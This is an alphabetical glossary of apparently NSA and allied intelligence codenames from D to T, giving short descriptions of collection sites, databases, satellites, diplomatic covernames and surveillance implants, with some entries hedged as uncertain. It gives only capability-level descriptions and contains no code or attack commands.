DROPOUTJEEP – STRAITBIZARRE-based software implant for iPhone, initially close access but later remotely

– System for processing data from mobile communication networks

DRUID – SIGINT Exchange Designator for third party countries

– A US military numeral cipher/authentication system

DRYTORTUGAS – Analytic tool

DYNAMO – SIGINT Exchange Designator for Denmark

E

EAGLE – Upstream collection site

– A SIGINT collection network run by Australia, Canada, New Zealand, the United Kingdom, and the United States

ECHO – SIGINT Exchange Designator for Australia

ECRU (EU) – Compartment of the ENDSEAL control system

EDEN – Upstream collection site

EGOTISTICALGIRAFFE (EGGI) – NSA program for exploiting the TOR network

EGOTISTICALGOAT (EGGO) – NSA tool for exploiting the TOR network

EIDER – Retired SIGINT product codeword

EINSTEIN – Cell phone network intercepting equipment used by SCS units

– Intrusion detection system for US government network gateways (deployed in 2004)

EINSTEIN 2 – Second version of the EINSTEIN program for detecting malicious network activity

EINSTEIN 3 – Third version of the EINSTEIN program that will monitor government computer traffic on private sector sites too

ELEGANTCHAOS – Large scale FORNSAT data analysis system

EMBRACEFLINT – Tool for computer network operations

ENDSEAL (EL) – SCI control system

ENDUE – A COI for sensitive decrypts of the BULLRUN program

ENTOURAGE – Directional finder for line of bearing for GSM, UMTS, CDMA, FRS signals, works with NEBULA active interrogator within GALAXY program

EPICSHELTER – Sophisticated data backup system designed by Edward Snowden

ERRONEOUSINGENUITY (ERIN) – NSA tool for exploiting the TOR network

EVENINGEASEL – Program for surveillance of phone and text communications from Mexico’s cell phone network

EVILOLIVE – Iinternet geolocation tool

EVOLVED MUTANT BROTH – Second party database

EYESPY – System that scans data for logos of companies, political parties and other organizations, as well for pictures with faces for facial recognition

F

FACELIFT – Codeword related to NSA’s Special Source Operations division

– NSA corporate partner with access to international cables, routers, and switches (since 1985)

FAIRVIEWCOTS – System for processing telephony metadata collected under the FAIRVIEW program

FALLENORACLE – NSA tool or database

FALLOUT – DNI metadata ingest processor/database

– DNR metadata ingest processor/database

FASCINATOR – Series of Type 1 encryption modules for Motorola digital-capable voice radios

FASHIONCLEFT (FC) – Wrapper used to exfiltrate data of VPN and VoIP communications

FASTBAT – Telephony related database?

FASTFOLLOWER – Tool to identify foreign agents who might tail American case officers overseas by correlating cellphone signals

FASTSCOPE – NSA database

FEEDTROUGH – Software implant for unauthorized access to Juniper firewall models N5XT, NS25, NS50, NS200, NS500, ISG1000

FERRETCANON – Subsystem of the FOXACID system

FINKDIFFERENT (FIDI) – Tool used for exploiting TOR networks

FIRE ANT – Open Source visualisation tool

– NSA key generation scheme, used for exchanging EKMS public keys

FIRETRUCK – SIGINT tool or database

FIREWALK -Bidirectional network implant, passive gigabit ethernet traffic collector and active ethernet packet injector within RJ45 Dual Stacked USB connector, digital core used with HOWLERMONKEY, formerly RADON

– NSA program for securing commercial smartphones

FLARE – Retired SIGINT product codeword

FLATLIQUID – TAO operation against the office of the Mexican president

FLEMING – The embassy of Slovakia in Washington DC

FLINTLOCK – The DICTIONARY computer used at the Waihopai station of ECHELON

FLUXBABBITT – Hardware implant for Dell PowerEdge RAID servers using Xeon processors

FOGGYBOTTOM – Computer implant plug-in that records logs of internet browsing histories and collects login details and passwords used to access websites and email accounts

FOREMAN – Tactical SIGINT database? Used to determine ‘foreigness’

FOURSCORE – (former?) database for fax and internet data

FOXACID (FA?) – System of secret internet servers used to attack target computers

FOXSEARCH – Tool for monitoring a QUANTUM target which involves FOXACID servers

FOXTRAIL – NSA tool or database

FRIARTUCK – VPN Events tool or database (CSEC?)

FREEFLOW-compliant – Supported by TURBULENCE architecture

FREEZEPOST – Something related to NSA’s TAO division

FRONTO – Retired SIGINT Exchange Designator for ?

FROSTBURG – Connection Machine 5 (CM-5) supercomputer, used by NSA from 1991-1997

FROTH – Retired SIGINT product codeword

FRUGALSHOT – FOXACID servers for receiving callbacks from computers infected with NSA spying software

G

GALACTICHALO – Remote SATCOM collection facility

GALAXY – Find/fix/finish program of locating signal-emitting devices of targets

GAMMA (G) – Compartment for highly sensitive communication intercepts

GAMUT – NSA collection tasking tool or database

GARLIC – The NSA satellite intercept station at Bad Aibling (Germany)

GATEKEEPER – NSA user account management system

GAVEL – Retired SIGINT product codeword

GECKO II – System consisting of hardware implant MR RF or GSM, UNITEDRAKE software implant, IRONCHEF persistence back door

GEMINI – Remote SATCOM collection facility

GENESIS – Modified GSM handset for covert network surveys, recording of RF spectrum use, and handset geolocation based on software defined radio

GENIE – Overall close-access program, collection by Sigads US-3136 and US-3137

GHOSTMACHINE – NSA’s Special Source Operations cloud analytics platform

GINSU – Provides software persistence for the CNE implant KONGUR having PCI bus hardware implant BULLDOZER on MS desktop PCs

GILGAMESH – Predator-based NSA geolocation system used by JSOC

GISTQEUE (GQ) – NSA software or database

GJALLER – NSA tool or database

GLINT – Retired SIGINT product codeword

GLOBALBROKER – NSA tool or database

GM-PLACE – Database for the BOUNDLESSINFORMANT tool

GODLIKELESION – Modernization program for NSA’s European Technical Center (ETC) in Wiesbaden in 2011

GODSURGE – Runs on FLUXBABBITT circuit board to provide software persistence by exploiting JTAG debugging interface of server processors, requires interdiction and removal of motherboard of JTAG scan chain reconnection

GOPHERSET – Software implant on GMS SIM phase 2+ Toolkit cards that exfiltrates contact list, SMS and call log from handset via SMS to user-defined phone; malware loaded using USB smartcard reader or over-the-air.

GOSSAMER – SIGINT/EW collection and exploitation system

GOTHAM – Processor for external monitor recreating target monitor from red video

GOURMETTROUGH – Configurable implant for Juniper NetScreen firewalls including SSG type, minimal beaconing

GOUT – Subcompartment of GAMMA for intercepts of South Vietnamese government communications

GOVPORT – US government user authentication service

GRAB – SIGINT satellite program

GREY FOX – The 2003 covername of the Mission Support Activity (MSA) of JSOC

GREYSTONE (GST) – CIA’s highly secret rendition and interrogation programs

GROK – Computer implant plug-in used to log keystrokes

GUMFISH – Computer implant plug-in to take over a computer’s webcam and snap photographs

GUPY – Subcompartment of GAMMA for intercepts from Soviet leadership car phones (1960’s-70’s)

H

HALLUXWATER – Software implant as boot ROM upgrade for Huawei Eudemon firewalls, finds patch points in inbound packet processing, used in O2, Vodafone and Deutsche Telekom

HAMMERCHANT – Implant for network routers to intercept and perform exploitation attacks against data sent through a Virtual Private Network (VPN) and/or phone calls via Skype and other VoIP software

HAMMERMILL – Insertion Tool controls HEADWATER boot ROM backdoor

HAMMERSTEIN – Implant for network routers to intercept and perform exploitation attacks against data sent through a Virtual Private Network (VPN) and/or phone calls via Skype and other VoIP software

HAPPYFOOT – Program that intercepts traffic generated by mobile apps that send a smartphone’s location to advertising networks

HARD ASSOCIATION – Second party database

– An IBM supercomputer used by NSA from 1962-1976

HAVE BLUE – Development program of the F-117A Stealth fighter-bomber

HAVE QUICK (HQ) – Frequency-hopping system protecting military UHF radio traffic

HEADWATER – Permanent backdoor in boot ROM for Huawei routers stable to firmware updates, installed over internet, capture and examination of all IP packets passing through host router, controlled by Hammermill Insertion Tool

HEMLOCK – Operation against the Italian embassy in Washington DC using HIGHLANDS techniques

HERCULES – CIA terrorism database

HERETIC – NSA tool or database

HEREYSTITCH – Collaboration program between NSA units T1222 and SSG

HERMOS – Joint venture between the German BND and another country with access for NSA (2012)

HERON – Retired SIGINT product codeword

HIGHCASTLE – Tactical database?

HIGHLANDS – Technique for collection from computer implants

HIGHTIDE – NSA tool or database

HOBGOBLIN – NSA tool or database

HOLLOWPOINT – Software defined radio platform

HOMEBASE – Database which allows analysts to coordinate tasking with DNI mission priorities

HOMEMAKER – Upstream collection site

HOMINGPIGEON – Program to intercept communications from airplane passengers

HOTZONE – ?

HOWLERMONKEY (HM) – Generic radio frequency (RF) transceiver tool used for various applications

HUFF – System like FOXACID?

HYSON – Retired SIGINT product codeword

I

ICEBERG – Major NSA backbone project

ICREACH – Tool that uses telephony metadata

IDITAROD (IDIT) – Compartment of the KLONDIKE control system

INCENSER – A joint NSA-GCHQ high-volume cable tapping operation, part of the WINDSTOP program

INDIA – SIGINT Exchange Designator for New Zealand (retired)

– Satellite intercept station near Khon Khaen, Thailand (1979-ca. 2000)

INTREPID SPEAR – The 2009 covername of the Mission Support Activity (MSA) of JSOC

– Series of ELINT and COMINT spy satellites (since 2009)

IRATEMONK – Hard drive firmware providing software persistence for desktops and laptops via Master Boot Record substitution, for Seagate Maxtor Samsung file systems FAR NRFS EXT3 UFS, payload is implant installer, shown at internet cafe

IRONAVENGER – NSA hacking operation against an ally and an adversary (2010)

IRONCHEF – Provides access persistence back door exploiting BIOS and SMM to communicate with a 2-way RF hardware implant

IRONSAND – Second Party satellite intercept station in New Zealand

ISHTAR – SIGINT Exchange Designator for Japan (retired)

ISLANDTRANSPORT – Internal messaging service, as part of the QUANTUM system

IVORY – Retired SIGINT product codeword

IVY BELLS – NSA, CIA and Navy operation to place wire taps on Soviet underwater communication cables

J

JACKKNIFE – The NSA satellite intercept station at Yakima (US)

JACKPOT – Internal NSA process improvement program (early 1990s – early 2000s)

JETPLOW – Persistent firmware back door for Cisco PIX and ASA firewall and routers, modifies OS at boot time

JOLLYROGER – NSA database

JOSEKI-1 – Classified Suite A algorithm

JOURNEYMAN – Major NSA backbone project

JUGGERNAUT – Ingest system for processing signals from (mobile?) phone networks

– Class of SIGINT reconnaissance satellites (1971-1983)

JUNIORMINT – Implant digital core, either mini printed circuit board or ultra-mini Flip Chip Module, contains ARM9 micro-controller, FPGA Flash SDRAM and DDR2 memories

K

KAMPUS – SIGINT Exchange Designator for ? (retired)

KANDIK (KAND) – Compartment of the KLONDIKE control system

KARMA POLICE – Second party database

KATEEL – The Brazilian embassy in Washington

KEA – Asymmetric-key Type 2 algorithm used in products like Fortezza, Fortezza Plus

KEELSON – Internet metadata processing system

KEYCARD – Database for VPN key exchange IP packet addresses

KEYRUT – SIGINT Exchange Designator for ? (retired)

KILTING – ELINT database

KIMBO – Retired SIGINT product codeword

KLIEGLIGHT (KL) – Tactical SIGINT reports

KLONDIKE (KDK) – Control system for sensitive geospatial intelligence

KLONDIKE – The embassy of Greece in Washington DC

KNIGHTHAWK – Probably a military SIGINT tool

– Method for summarizing very large textual data sets

KONGUR – Software implant restorable by GINSU after OS upgrade or reinstall

KRONE – Retired SIGINT product codeword

L

(LAC) – Retired NSA dissemination control marking

LADYLOVE – The NSA satellite intercept station at Misawa, Japan (since 1982)

LANYARD – Reconaissance satellite program

LARUM – Retired SIGINT product codeword

LEGION AMBER – Chinese hacking operation against a major US software company

LEGION JADE – A group of Chinese hackers

LEGION RUBY – A group of Chinese hackers

LEGION YANKEE – Chinese hacking operation against the Pentagon and defense contractors (2011)

LEMONWOOD – NSA satellite intercept station in Thailand

LEXHOUND – Tool for targeting social networking?

LIBERTY – First word of nicknames for collection and analysis programs used by JSOC and other sensitive DOD activities

LIBERTY BLUE – Modified RC-12 Guardrail surveillance airplane used by JSOC’s Mission Support Activity (MSA)

LIFESAVER – Technique which images the hard drive of computers

LIONSHARE – Internal NSA process improvement program (2003-2008)

LITHIUM – Facility to filter and gather data at a major (foreign?) telecommunications company under the BLARNEY program

LODESTONE – NSA’s CRAY-1 supercomputer

LOGGERHEAD – Device to collect contents of analog cell phone calls (made by Harris Corp.)

LOMA – SCI control system for Foreign Instrumentation and Signature Intelligence

LOPERS – Software application for Public Switched Telephone Networks or some kind of hardware

LOUDAUTO – An ANGRYNEIGHBOR radar retro-reflector, microphone captures room audio by pulse position modulation of square wave

M

MACHINESHOP – ?

MADCAPOCELOT – Sub-program of STORMBREW for collection of internet metadata about Russia and European terrorism

MAESTRO-II – Mini digital core implant, standard TAO implant architecture

MAGIC – Codeword for decrypted high-level diplomatic Nazi messages

– A keystroke logging software developed by the FBI

MAGNES – Remote SATCOM collection facility

MAGNETIC – Technique of sensor collection of magnetic emanations

– Series of SIGINT spy satellites (since 1985)

MAGOTHY – The embassy of the European Union in Washington DC

MAILORDER – Data transfer tool (SFTP-based?)

– Federal database of personal and financial data of suspicious US citizens

– NSA database of bulk phone metadata

MANASSAS – Former NSA counter-encryption program, succeeded by BULLRUN

– NSA database of bulk internet metadata

MARKHAM – NSA data system?

MARTES – NSA software tool to prepare reports

MASTERLINK – NSA tasking source

MASTERSHAKE – NSA tool or database

MATRIX – Some kind of data processing system

MAYTAG – Upstream collection site

MEDLEY – Classified Suite A algorithm

MENTOR – Class of SIGINT spy satellites (since 1995)

MERCED – The Bulgarian embassy in Washington DC

MERCURY – Soviet cipher machine partially exploited by NSA in the 1960’s

MERCURY – Remote SATCOM collection facility

MESSIAH – NSA automated message handling system

METAWAVE – Warehouse of unselected internet metadata

METROTUBE – Analytic tool for VPN data

METTLESOME – NSA Collection mission system

MIDAS – Satellite program

MIDDLEMAN – TAO covert network

MILKBONE – Question-Focused Dataset used for text message collection

– A sister project to Project SHAMROCK (1967-1973)

MINERALIZE – Technique for collection through LAN implants

MIRANDA – Some kind of number related to NSA targets

MIRROR – Interface to the ROADBED system

MOCCASIN – A hardware implant, permanently connected to a USB keyboard

MONKEYCALENDAR – Software implant on GMS SIM cards that exfiltrates user geolocation data

MONKEYROCKET – Sub-program of OAKSTAR for collecting internet metadata and content through a foreign access point

MOONLIGHTPATH (EGL?) – SSO collection facility

MOONPENNY – The NSA satellite intercept station at Harrogate (Great Britain)

MORAY – Compartment for the least sensitive COMINT material, retired in 1999

MORPHEUS – Program of the Global Access Operations (GAO)

MOTHMONSTER – NSA tool for exploiting the TOR network

MOVEONYX – Tool related to CASPORT

MULBERRY – The mission of Japan at the United Nations in New York

(JPM?) – Joint NSA-GCHQ operation to tap the cables linking Google and Yahoo data clouds to the internet Part of WINDSTOP

MUSKET – Retired SIGINT Exchange Designator for ?

MUSKETEER – NSA’s Special Signal Collection unit

– SSO unilateral voice interception program

– Presidential Global Communications System

N

NASHUA – The mission of India at the United Nations in New York

NAVAJO – The mission of Vietnam at the United Nations in New York

NAVARRO – The embassy of Georgia in Washington DC

NEBULA – Base station router similar to CYCLONE Hx9

NECTAR – SIGINT Exchange Designator for ? (retired)

NELEUS – Remote SATCOM collection facility

NEMESIS – SIGINT satellite

– Operation to kill or capture Osama bin Laden (2011)

NETBOTZ – Remote monitoring tool

NEWSDEALER – NSA’s internal intelligence news network

NIAGARAFILES – Data transfer tool (SFTP-based?)

NIGHTSTAND – 802.11 wireless packet injection tool that runs on standalone x86 laptop running Linux Fedora Core 3 and exploits windows platforms running Internet Explorer, from 8 miles away

NIGHTWATCH – Portable computer in shielded case for recreating target monitor from progressive-scan non-interlaced VAGRANT signals

NINJANIC – Something related to TURMOIL

NITESURF – NSA tool or database

NITRO – Remote SATCOM collection facility

NOCON – NSA dissemination marking or COI

NONBOOK (NK) – Compartment of the ENDSEAL control system

NORMALRUN – NSA tool or database

NUCLEON – Database for contents of phone calls

NYMROD – Automated name recognition system

O

– Umbrella program to filter and gather information at major telecommunications companies (since 2004)

OCEAN – Optical collection system for raster-based computer screens

OCEANARIUM – Database for SIGINT from NSA and intelligence sharing partners around the world

OCEANFRONT – Part of the communications network for ECHELON

OCEAN SHIELD – NATO anti-piracy operation

OCEANSURF – Engineering hub of the Global Access Operations (GAO)

OCELOT – Actual name: MADCAPOCELOT

OCTAVE – NSA tool for telephone network tasking (succeeded by the UTT?)

OCTSKYWARD – Collection of GSM data from flying aircraft

OILSTOCK – A system for analyzing air warning and surveillance data

– CSEC tool for discovering and identifying telephone and computer connections

OLYMPIC – First word of nicknames for programs involving defense against Chinese cyber-warfare and US offensive cyber-warfare

OLYMPIC GAMES – Joint US and Israel operation against the Iranian nuclear program (aka Stuxnet)

OLYMPUS – Software component of VALIDATOR/SOMBERKNAVE used to communicate via wireless LAN 802.11 hardware

OMNIGAT – Field network component

ONEROOF – Main tactical SIGINT database, with raw and unfiltered intercepts

– Newer units of the LACROSSE reconaissance satellites

ORANGEBLOSSOM – Sub-program of OAKSTAR for collection from an international transit switch (sigad: US-3251)

ORANGECRUSH – Sub-program of OAKSTAR for collecting metadata, voice, fax, phone and internet content through a foreign access point

ORION – SIGINT satellite

ORLANDOCARD – NSA operation thtat attracted visits from 77,413 foreign computers and planted spyware on more than 1,000 by using a ‘honeypot’ computer

OSAGE – The embassy of India in Washington DC

OSCAR – SIGINT Exchange Designator for the USA

OSWAYO – The embassy annex of India in Washington DC

– The Lockheed A-12 program (better known as SR-71)

P

PACKAGEDGOODS – Program which tracks the ‘traceroutes’ through which data flows around the Internet

PACKETSCOPE – Internet cable tapping system

PACKETSWING – NSA tool or database

PACKETWRENCH – Computer exploit delivered by the FERRETCANON system

PADSTONE – Type 1 Cryptographic algorithm used in several crypto products

PAINTEDEAGLE – SI-ECI compartment related to the BULLRUN program

PALANTERRA – A family of spatially and analytically enabled Web-based interfaces used by the NGA

PANGRAM (PM) – Alleged SCI control system

PANTHER – The embassy of Vietnam in Washington DC

PARCHDUSK (PD) – Productions Operation of NSA’s TAO division

PARTNERMALL PROGRAM (PMP) – A single collaboration environment, to be succeeded by the Global Collaboration Environment (GCE)

PARTSHOP – ?

PATHFINDER – SIGINT analysis tool (developed by SAIC)

PATHWAY – NSA’s former main computer communications network

– Call chaining analysis tool (developed by i2)

PAWLEYS – SI-ECI compartment related to the BULLRUN program

PEARL – Retired SIGINT product codeword

PEDDLECHEAP – Computer exploit delivered by the FERRETCANON system

PENDLETON – SI-ECI compartment related to the BULLRUN program

PEPPERBOX – Tool or database for targeting Requests (CSEC?)

PERDIDO – The mission of the European Union at the United Nations in New York

PERFECTMOON – An out-sites covering system

PHOTOANGLO – A continuous wave generator and receiver. The bugs on the other end are ANGRYNEIGHBOR class

PIEDMONT – SI-ECI compartment related to the BULLRUN program

PICARESQUE (PIQ) – SI-ECI compartment related to the BULLRUN program

PICASSO – Modified GSM handset that collects user data plus room audio

PINUP – Retired SIGINT product codeword

– Database for recorded signals intercepts/internet content

PITCHFORD – SI-ECI compartment related to the BULLRUN program

PIVOT – Retired SIGINT product codeword

PIXIE – Retired SIGINT product codeword

PLATFORM – Computer system linking the ECHELON intercept sites

PLUS – NSA SIGINT production feedback program

POCOMOKE – The Brazilian Permanent Mission to the UN in New York

POISON NUT – CES VPN attack orchestrator

POLARBREEZE – NSA technique to tap into nearby computers

POPPY – SIGINT satellite program

POPTOP – Collection system for telephony data

POWELL – The Greek mission at the United Nations in New York

PREFER – System for identifying and extracting text messages (SMS) from the DISHFIRE database

PRESSUREPORT – Software interface related to PRESSUREWAVE

PRESSUREWAVE – NSA cloud database for VPN and VoIP content and metadata

PRIMECANE – American high-tech company cooperating in providing a network access point for the ORANGECRUSH program

– Program for collecting foreign internet data from US internet companies

PROFORMA – Intelligence derived from computer-based data

– Mobile tactical SIGINT collection system

PROTEIN – SIGINT Exchange Designator for ?

PROTON – SIGINT database for time-sensitive targets/counterintelligence

PROTOSS – Local computer handling radio frequency signals from implants

PURPLE – Codename for a Japanese diplomatic cryptosystem during WWII

– US military OPSEC program (since 1966)

PUTTY – NSA tool or database

PUZZLECUBE – NSA tool or database

PYLON – SIGINT Exchange Designator for ?

Q

QUADRANT – A crypto implementation code

QUADRESPECTRE PRIME – ?

– A consolidated QUANTUMTHEORY platform to reduce latencies by co-locating passive sensors with local decisioning and traffic injection (under development in 2011)

– Secret servers placed by NSA at key places on the internet backbone; part of the TURMOIL program

QUANTUMBISCUIT – Enhancement of QUANTUMINSERT for targets which are behind large proxies

QUANTUMBOT – Method for taking control of idle IRC bots and botnets)

QUANTUMBOT2 – Combination of Q-BOT and Q-BISCUIT for webbased botnets

QUANTUMCOOKIE – Method to force cookies onto target computers

QUANTUMCOPPER – Method for corrupting file uploads and downloads

QUANTUMDNS – DNS injection/redirection based off of A record queries

QUANTUMHAND – Man-on-the-side technique using a fake Facebook server

QUANTUMINSERT (QI) – Man-on-the-side technique that redirects target internet traffic to a FOXACID server for exploitation

QUANTUMMUSH – Targeted spam exploitation method

QUANTUMNATION – Umbrella for COMMONDEER and VALIDATOR computer exploits

QUANTUMPHANTOM – Hijacks any IP address to use as covert infrastructure

QUANTUMSKY – Malware used to block targets from accessing certain websites through RST packet spoofing

QUANTUMSMACKDOWN – Method for using packet injection to block attacks against DoD computers

QUANTUMSPIN – Exploitation method for instant messaging

QUANTUMSQUEEL – Method for injecting MySQL persistant database connections

QUANTUMSQUIRREL – Using any IP address as a covert infrastructure

QUANTUMTHEORY (QT) – Computer hacking toolbox used by NSA’s TAO division, which dynamically injects packets into target’s network session

QUANTUM LEAP – CIA tool to “find non-obvious linkages, new connections, and new information” from within a dataset

QUARTERPOUNDER – Upstream collection site

– Relay satellite for reconaissance satellites

QUEENSLAND – Upstream collection site

R

RADIOSPRING – ?

RADON – Host tap that can inject Ethernet packets

RAGEMASTER – Part of ANGRYNEIGHBOR radar retro-reflectors, for red video graphics array cable in ferrite bead RFI chokers between video card and monitor, target for RF flooding and collection of VAGRANT video signal

(RGT) – ECI compartment for call and e-mail content collected under FISA authority

RAILHEAD – NCTC database project

RAISIN – NSA database or tool

RAMPART – NSA operational branches that intercept heads of state and their closest aides. Known divisions are RAMPART-A, RAMPART-I and RAMPART-T. Also mentioned as a suite of programs for assuring system functionality

RAVEN – SIGINT satellite

REACTOR – Tool or program related to MARINA?

REBA – Major NSA backbone project

REDHAWK – NSA tool

REDROOF – NSA tool

REMATION – Joint NSA-GCHQ counter-TOR workshop

RENOIR – NSA telephone network visualization tool

REQUETTE – A Taiwanese TECO in New York

RESERVE (RSV) – Control system for the National Reconnaissance Office (NRO)

RESERVEVISION – Remote monitoring tool

RESOLUTETITAN – Internet cable access program?

RETRO – see RETROSPECTIVE

RETROSPECTIVE – 30-day retrospective retrieval tool for SCALAWAG

RETURNSPRING – High-side server shown in UNITEDRAKE internet cafe monitoring graphic

RHINEHEART – NSA tool or database

– Class of SIGINT spy satellites (in 1975 changed to AQUACADE)

RICHTER – SIGINT Exchange Designator for Germany

RIPCORD – ?

RIVET JOINT – Reconaissance operation

ROADBED – Probably a military SIGINT database

ROCKYKNOB – Optional DSP when using Data Over Voice transmission in CROSSBEAM

RONIN – NSA tool for detecting TOR-node IP-addresses

RORIPA – SIGINT Exchange Designator for ?

ROYALNET – Internet exploitation tool

RUFF – Compartment of TALENT KEYHOLE for IMINT satellites

RUMBUCKET – Analytic tool

RUTLEY – Network of SIGINT satellites launched in 1994 and 1995

S

SABRE – Retired SIGINT product codeword

SALEM – ?

SALVAGERABBIT – Computer implant plug-in that exfiltrates data from removable flash drives that connect to an infected computer

SAMOS – Reconnaissance satellite program

SAPPY – Retired SIGINT product codeword

SARATOGA – SSO access facility (since 2011)

SARDINE – SIGINT Exchange Designator for Sweden

– Narrow band voice encryption for radio and telephone communication

SAVIN – Retired SIGINT product codeword

SCALAWAG – Collection facility under the MYSTIC program

SCALLION – Upstream collection site

SCAPEL – Second Party satellite intercept station in Nairobi, Kenia

SCHOOLMONTANA – Software implant for Juniper J-series routers used to direct traffic between server, desktop computers, corporate network and internet

SCIMITAR – A tool to create contact graphs?

SCISSORS – System used for separating different types of data and protocols

SCORPIOFORE – SIGINT reporting tool

SEABOOT – SIGINT Exchange Designator for ?

SEADIVER – Collection system for telephony data

SEAGULLFARO – High-side server shown in UNITEDRAKE internet cafe monitoring graphic

SEARCHLITE – Tactical SIGINT collecting system for like cell phone calls

SEASONEDMOTH (SMOTH) – Stage0 computer implant which dies after 30 days, deployed by the QUANTUMNATION method

SECONDDATE – Method to influence real-time communications between client and server in order to redirect web-browsers to FOXACID malware servers

SECUREINSIGHT – A software framework to support high-volume analytics

SEMESTER – NSA SIGINT reporting tool

– Transportable suite of ISR equipment (since 1991)

– Radome on top of the U2 to relay SIGINT data to ground stations

SENTINEL – NSA database security filter

SERENADE – SSO corporate partner (foreign?)

SERUM – Bank of servers within ROC managing approvals and ticket system

SETTEE – SIGINT Exchange Designator for ?

– Operation for intercepting telegraphic data going in or out the US (1945-1975)

SHAREDVISION – Mission program at Menwith Hill satellite station

SHARKFIN – Sweeps up all-source communications intelligence at high speed and volumes

SHARPFOCUS (SF2) – Productions Operation of NSA’s TAO division

SHELLTRUMPET – NSA metadata processing program (since December 2007)

SHENANIGANS – Aircraft-based NSA geolocation system used by CIA

SHIFTINGSHADOW – Sub-program of OAKSTAR for collecting telephone metadata and voice content from Afghanistan through a foreign access point

SHILLELAGH – Classified Suite A algorithm

SHORTSHEET – NSA tool for Computer Network Exploitation

SHOTGIANT – NSA operation for hacking and monitoring the Huawei network (since 2009)

SIERRAMONTANA – Software implant for Juniper M-series routers used by enterprises and service providers

SIGINT NAVIGATOR – NSA database

SIGSALY – The first secure voice system from World War II

SILKWORTH – A software program used for the ECHELON system

SILLYBUNNY – Some kind of webbrowser tag which can be used as selector

SILVER – Soviet cipher machine partially exploited by NSA in the 1960’s

SILVERCOMET – SIGINT satellites?

SILVERZEPHYR (SZ) – Sub-program of OAKSTAR for collecting phone and internet metadata and content from Latin and South America through an international transit switch

SIRE – A software program used for the ECHELON system(?)

– Type 2 Block cipher algorithms used in various crypto products

SKOPE – SIGINT analytical toolkit

SKYSCRAPER – Interface to the ROADBED system

SKYWRITER – NSA tool to prepare (internet) intelligence reports

SLICKERVICAR – Used with UNITEDRAKE or STRAITBIZARRE to upload hard drive firmware to implant IRATEMONK

SLINGSHOT – End Product Reports (CSEC?)

SMOKEYSINK – SSO access facility (since 2011?)

SNICK – 2nd Party satellite intercept station in Oman

SNORT – Repository of computer network attack techniques/coding

SOAPOPERA – (former?) database for voice, end product and SRI information

SOMBERKNAVE – Windows XP wireless software implant providing covert internet connectivity, routing TCP traffic via an unused 802.11 network device allowing OLYMPUS or VALIDATOR to call home from air-gapped computer

SORTING HAT – ?

SORTING LEAD – ?

SOUFFLETROUGH – Software implant in BIOS Juniper SSG300 and SSG500 devices, permanent backdoor, modifies ScreenOS at boot, utilizes Intel’s System Management Mode

SOUNDER – Second Party satellite intercept station at Cyprus

SPARKLEPONY – Tool or program related to MARINA

SPARROW II – Airborne wireless network detector running BLINDDATE tools via 802.11

SPECTRE – SCI control system for intelligence on terrorist activities

SPECULATION – Protocol for over-the-air communication between COTTONMOUTH computer implant devices, compatible with HOWLERMONKEY

SPHINX – Counterintelligence database of the Defense Intelligence Agency

SPINNERET (SPN) – SSO collection facility

SPLITGLASS – NSA analytical database

SPLUNK – Tool used for SIGINT Development

SPOKE – Compartment for less sensitive COMINT material, retired in 1999

SPOTBEAM – ?

SPORTCOAST – Upstream collection site

SPRIG – Retired SIGINT product codeword

SPRINGRAY – Some kind of internal notification system

SPYDER – Analytic tool for selected content of text messages from the DISHFIRE database

STARBURST – The initial code word for the STELLARWIND compartment

STARLIGHT – Analyst tool

STARPROC – User lead that can be uses as a selector

STARSEARCH – Target Knowledge tool or database (CSEC?)

STATEROOM – Covert SIGINT collection sites based in US diplomatic facilities

STEELFLAUTA – SSO Corporate/TAO Shaping program

STEELKNIGHT – (foreign?) partner providing a network access point for the SILVERZEPHYR program

STEELWINTER – A supercomputer acquired by the Norwegian military intelligence agency

STELLAR – Second Party satellite intercept station at Geraldton, Australia

STELLARWIND (STLW) – SCI compartment for the President’s Surveillance Program information

STEPHANIE – Covert listening post in the Canadian embassy in Moscow (est. 1972)

STINGRAY – Device for tracking the location of cell phones (made by Harris Corp.) STONEGHOST – DIA network for information exchange with UK, Canada, Australia and New Zealand (TS/SCI)

STORMBREW – Program for collection from an international transit switches and cables (since 2001)

STRAIGHTBIZARRE – Software implant used to communicate through covert channels

STRATOS – Tool or databse for GPRS Events (CSEC?)

STRAWHAT – NSA datalinks between field sites and processing centers (1969-?)

STRIKEZONE – Device running HOWLERMONKEY personality

STRONGMITE – Computer at remote operations center used for long range communications

STRUM – (see abbreviations)

STUCCOMONTANA – Software implant for Juniper T-Series routers used in large fixed-line, mobile, video, and cloud networks, otherwise just like SCHOOLMONTANA

STUMPCURSOR – Foreign computer accessing program of the NSA’s Tailored Access Operations

SUBSTRATUM – Upstream collection site

SUEDE – Retired SIGINT product codeword

SULPHUR – The mission of South Korea at the United Nations in New York

SUNSCREEN – Tool or database

SURFBOARD – NSA tool or database

SURLEYSPAWN – Data RF retro-reflector, gathers keystrokes FSK frequency shift keyed radar retro-reflector, USB or IBM keyboards

SURPLUSHANGAR – High to low diode, part of the QUANTUM system

SURREY – Main NSA requirements database, where tasking instructions are stored and validated, used by the FORNSAT, SSO and TAO divisions

SUTURESAILOR – Printed circuit board digital core used with HOWLERMONKEY

SWAMP – NSA data system?

SWAP – Implanted software persistence by exploiting motherboard BIOS and hard drive Host Protected Area for execution before OS loads, operative on windows linux, freeBSD Solaris

– NSA data model for analyzing target connections

T

TACOSUAVE – ?

TALENT KEYHOLE (TK) – Control system for space-based collection platforms

TALK QUICK – An interim secure voice system created to satisfy urgent requirements imposed by conditions to Southeast Asia. Function was absorbed by AUTOSEVOCOM

TAPERLAY – Covername for Global Numbering Data Base (GNDB), used for looking up the registered location of a mobile device

TARMAC – Improvement program at Menwith Hill satellite station

TAROTCARD – NSA tool or database

TAWDRYYARD – Beacon radio frequency radar retro-reflector used to positionally locate deployed RAGEMASTER units

TEMPEST – Investigations and studies of compromising electronic emanations

– GCHQ program for intercepting internet and telephone traffic

THESPIS – SIGINT Exchange Designator for ?

THINTREAD – NSA program for wiretapping and sophisticated analysis of the resulting data

THUMB – Retired SIGINT product codeword

THUNDERCLOUD – Collaboration program between NSA units T1222 and SSG

TIAMAT – Joint venture between the German BND and another country with access for NSA

TICKETWINDOW – System that makes SSO collection available to 2nd Party partners

TIDALSURGE – Router Configurations tool (CSEC?)

TIDEWAY – Part of the communications network for ECHELON

TIMBERLINE – The NSA satellite intercept station at Sugar Grove (US)

TINMAN – Database related to air warning and surveillance

TITAN POINTE – Upstream collection site

– Presumably Chinese attacks on American computer systems (since 2003)

TITLEHOLDER – NSA tool

TOPAZ – Satellite program

TOTECHASER – Software implant in flash ROM windows CE for Thuraya 2520 satellite/GSM/web/email/MMS/GPS

